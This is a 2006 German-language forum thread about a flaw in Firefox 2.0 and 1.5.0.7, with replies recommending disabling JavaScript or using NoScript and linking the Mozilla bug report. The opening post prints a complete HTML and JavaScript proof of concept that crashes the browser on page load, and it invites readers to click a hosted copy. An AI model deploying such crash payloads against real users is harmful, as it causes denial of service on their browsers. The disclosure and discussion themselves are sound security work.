FLAW in Firefox 2.0 und 1.5.0.7

Eine Schwachstelle in den o.g. genannten Versionen des beliebten Firefoxbrowsers ermoeglicht Denial of Service und u.U. die Ausfuehrung von Remote Code.

Hallo liebe Gemeinde!

Einfach mal auf diesen Link klicken, Browser wird sofort abgeschossen.

PoC hier: http://werterxyz.altervista.org/Firefox2Range.htm

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
<html>
<head>
<script type="text/javascript">  
function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');  
}
</script>
</head>
<body onload="do_crash()">  
<p>Good bye Firefox!</p>
</body>
</html>

[31.10.2006, 03:14 am, von "xxxx"]

saludos
gnarff

Please also mark the comments that contributed to the solution of the article

Content-Key: 43533

Url: https://administrator.de/contentid/43533

Printed on: April 16, 2024 at 22:04 o'clock

2 Comments

Latest comment

Hallo,

nein, stürzt nicht ab. Javascript habe ich nämlich schon lange nicht mehr aktiviert und das kann man nur jedem raten. Beziehungsweise um es differenzierter abzuschalten:

http://www.erweiterungen.de/detail/NoScript/

Gruß,
Tim

hallo tim

Hallo,

nein, stürzt nicht ab. Javascript habe
ich nämlich schon lange nicht mehr
aktiviert und das kann man nur jedem raten.

ja, aber der bug im code bleibt trotzallem unbehoben:
https://bugzilla.mozilla.org/show_bug.cgi?id=358797

Beziehungsweise um es differenzierter
abzuschalten:

http://www.erweiterungen.de/detail/NoScript/

gute idee, diese erweiterung kannte ich noch nicht...

Gruß,
Tim

saludos
gnarff

German closed solved Question Security

Hotly discussed

End of Support dates for Office 2016, 2019 Apps und Productivity ServersDani - 1 Comment